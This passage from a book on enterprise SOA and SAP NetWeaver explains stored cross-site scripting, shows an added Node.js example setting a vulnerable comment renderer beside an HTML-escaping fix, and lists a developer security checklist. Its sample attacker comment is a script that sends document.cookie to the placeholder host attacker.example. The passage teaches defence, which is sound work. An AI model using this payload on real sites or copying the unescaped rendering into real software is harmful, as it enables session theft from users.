19.7. How do you develop secure composite applications without weaknesses?

The first step will be to develop security-friendly patterns of development: a set of frameworks for creating composite applications out of components that are secure by construction. SAP will do its part by linking future versions of modeling tools such as SAP NetWeaver Visual Composer to the security operations layer of enterprise services, so that enterprise architects can combine services without having to address security explicitly for every combination.

But developers will also need frameworks and security training to guide them in designing applications that resist common attacks such as cross-site scripting (XSS). In the stored variant, an attacker submits malicious JavaScript through a web form; the server keeps the input and, if it does not encode it, places it verbatim in the page it serves to the next customer who views that form. The script then runs in that customer's browser under your site's origin, where it can read the session cookie and act on the user's behalf. The host machine is not harmed; your users are the victims. Learning to thwart these attacks is less an ESA issue than a matter of development best practices, but the issue becomes much more tangible once critical processes are exposed beyond the corporate firewall.
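The following is an added example, not code from the book or from SAP NetWeaver: a minimal Node.js comment feature with the stored XSS defect just described, next to a fixed version that HTML-encodes user input before placing it in the page. The comment texts, the attacker host attacker.example, the in-memory comment store and the function names are all constructed for this example.

```javascript
// Added example (not from the book or SAP NetWeaver): stored cross-site
// scripting in a minimal comment feature, beside the fix. Node.js, no deps.

// Constructed sample input: what an attacker submits through the comment form.
// attacker.example is a placeholder host, not a real endpoint.
const ATTACKER_COMMENT =
  '<script>fetch("https://attacker.example/steal?c=" + document.cookie)</script>';
const HONEST_COMMENT = 'Great product, 5 < 10 stars';

// In-memory stand-in for the database where the server persists comments.
const commentStore = [];

function storeComment(text) {
  commentStore.push(text);
}

// Vulnerable rendering: comments are interpolated straight into the HTML that
// every later visitor receives, so the attacker's <script> executes in each
// visitor's browser, under this site's origin.
function renderPageVulnerable() {
  return '<ul>' + commentStore.map(c => `<li>${c}</li>`).join('') + '</ul>';
}

// Fix: encode the characters HTML treats as markup before interpolating.
// '&' must be replaced first so the entities produced later are not re-encoded.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

function renderPageSafe() {
  return '<ul>' + commentStore.map(c => `<li>${escapeHtml(c)}</li>`).join('') + '</ul>';
}

// Crude detector used to compare the two renderings: is there a live <script> tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Simulates the sequence in the text: an honest and an attacker comment are
// stored, then the page is rendered for the next visitor both ways.
function demo() {
  commentStore.length = 0;
  storeComment(HONEST_COMMENT);
  storeComment(ATTACKER_COMMENT);
  return { vulnerable: renderPageVulnerable(), safe: renderPageSafe() };
}

if (typeof require !== 'undefined' && require.main === module) {
  const out = demo();
  console.log('vulnerable page:', out.vulnerable);
  console.log('safe page:      ', out.safe);
}
```

Output encoding at the point where data meets the page is the fix; validating input on the form is a useful extra but not a substitute, because the same comment may legitimately contain `<` (as the honest comment does) and still have to render harmlessly.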

SAP NetWeaver already includes frameworks to support secure programming. In addition, the SAP NetWeaver Developer's Guide includes a multiple-page security checklist for developers finishing their applications. The checklist leads off with questions such as:

  • Is no security-relevant data stored on the client?

  • Is the application free of back doors?

  • Do all security mechanisms follow a consistent, documented concept, rather than relying on "security by obscurity"?

  • Does the system pass into a safe state in case of errors?

  • Is the data stored in a secure way beyond the application session?

  • Are no static (hard-coded) keys used when encrypting data?

  • Are encrypted data and keys always stored separately from each other, so that an attacker who obtains one does not thereby obtain the other?

Additional resources include the Secure Programming section on the SAP Developer Network (SDN; http://sdn.sap.com).




Enterprise SOA: Designing IT for Business Innovation
ISBN: 0596102380
Year: 2004
Pages: 265
